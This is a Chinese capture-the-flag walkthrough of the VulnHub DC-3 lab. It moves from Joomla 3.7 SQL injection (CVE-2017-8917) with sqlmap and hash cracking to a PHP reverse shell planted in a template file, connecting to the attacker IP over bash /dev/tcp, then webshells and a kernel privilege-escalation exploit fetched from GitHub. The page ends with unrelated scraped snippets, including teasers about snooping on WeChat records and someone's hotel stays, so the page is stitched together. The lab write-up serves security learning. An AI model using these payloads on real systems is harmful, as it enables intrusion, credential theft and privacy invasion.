Joomla是一套全球知名的内容管理系统,它是使用php语言+MySQL数据库所开发的软件系统。可以在Linux、 Windows、Macosx等各种不同的平台上执行。常用于搭建商业网站、个人博客、信息管理系统、Web 服务等,但是最适合是用来做电子商务的网站。还可以进行二次开发以扩展使用范围。 功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。
1、先进的网站技术的运用
2、庞大的附加套件及商机
3、简单丰富的操作接口
4、高度客制和开发弹性
5、内核集成完善的SEO友好机制
6、超过70多种国家语言支持
(为了方便,两台机器我都设置为桥接模式)
攻击机:192.168.0.114
靶机:192.168.0.106
靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/
目标:/root目录下的flag(一个)
可能会遇到的错误:
IDE 设备(磁盘/CD-ROM)配置不正确。“ide1:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide1:1”移到“ide1:0”。
是因为把光驱给删除了,就会一直报这个错!
解决 *** :
选择具体的虚拟机,点击 “虚拟机”->“设置”->“CD/DVD(IDE)" ->”高级“,将要启动设备设置到 IDE 0:0 上就可以了。
nmap扫描,得到靶机的ip,开放了80端口,可以访问nhttp服务,而且还扫描出了网站的后台是Joomla的cms系统。
访问http服务,提示靶场中只有一个flag,但是要得到root权限才可以。
因为是joomla的cms系统,所以可以用扫描工具joomscan来探测信息
joomscan工具安装:
git clone https://github.com/rezasp/joomscan.git
cd joomscan
使用:
perl joomscan.pl --url 具体的url
还可以使用nmap来探测
扫描出joomla的版本为3.7,存在有一个cve-2017-8917的漏洞(利用该漏洞攻击者可以在未授权的情况下进行SQL注入攻击)
可以使用searchsploit来查找对应版本有一个sql注入
searchsploit Joomla 3.7.0
SQL注入漏洞利用的poc:
爆数据库名
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" ?--dbs --batch
爆表名,发现有张#_users表
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" ?-D joomladb --tables --batch
爆字段,无法获取字段名
那就尝试去猜解字段名,得到账户和密码密文
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" ?-D joomladb -T "#__users" -C name,password --dump --batch
把爆出来的hash值放在一个新建的hash.txt文件中,然后使用john来获取明文密码为:snoopy
john? hash.txt
访问我们信息收集到的网站的后台:http://ip:port/administrator
我的为:http:192.168.0.106:80/administrator? ?成功登录
在Templates模版设置中,可以编辑这些php文件,然后从外部访问。
在任意一个php文件中插入木马都可以
在模版中添加反弹php的shell的语句,然后监听就可以
<?php system("bash -c 'bash -i >& /dev/tcp/kali的ip/4444 0>&1' "); ?>
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.0.114/4444 0>&1' "); ?>
在kali中设置好监听窗口,然后在浏览器访问:192.168.0.106/templates/beez3/error.php,反弹shell
直接插入php一句话木马,使用蚁剑连接成功
冰蝎默认的php木马
成功getshell
用msfvenom生成一个shell,然后将其复制到网站的php文件中,在设置监听,就可以getshell了
还可以上传其他的webshell
可以不是root权限
执行uname -a查看内核版本,靶场环境系统为ubuntu 16.04
使用searchsploit查看Ubuntu 16.04存在的漏洞
查看漏洞介绍
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
介绍中给出了exp的地址:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
下载exp,使用刚才的蚁剑获得的权限将其上传
解压运行,成功提权
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
https://www.freebuf.com/articles/web/compile.sh
https://www.freebuf.com/articles/web/doubleput
查看flag
1、可以了解一下Joomla
2、joomscan扫描工具的使用
3、cve-2017-8917漏洞的利用
4、利用linux的内核漏洞进行提权
我跟你讲个简单的道理哦!你自己的微信号,换部手机登入,经常还要验证一下对吧,然后进去了,有没有聊天记录?顶多就是最后聊天的那几句话有,有时候。 微信聊天记录怎么查?我们已经习惯了使用微信来聊天,不仅仅...
和谁开过房能查出来吗 导语:当今少许年青人短缺应有的信托。他们都对本人的男朋友和女友持质疑立场,忧虑她或他会在背地做少许不但彩的工作。浙江忻州一位女孩质疑男朋友出轨。她想观察他的开Fang纪录,并在...
第一步,咱们先看看文件的信息file stack0,从回来信息能够看出该程序是一个32位可履行程序,从最终的not stripped能够看出这个程序的符号信息,具体有关stripped具体介绍能够百度...
这几年,不少人在装修新房的时候都开始思量智能门锁,甚至一些人都开始把自家原本的机器锁换成智能门锁。那毕竟智能门锁有着怎么样的魅力呢,一起来看看标居智能锁怎么样 标居智能锁成果,相信会给您一个更好的...
【文章百度收录网说】盗不上的,这个是骗子公司,假冒网络黑客骗财,全是骗子公司,不必出钱,不必信 被盗微信号? 手机微信被盗,那样的状况能够根据自助解封,找一位你手机微信好友,随后协助你解封,自助解...
淡然的意思(淡然是生命中一道靓丽的风景)生命是绚烂多彩的,而淡然就是生命中的一道风景,只有懂得淡然真正含义的人才会窥探到生命的真谛。在淡然中体会生命的意义,品尝生活的味道,你就能寻找到为人处世的奥秘。...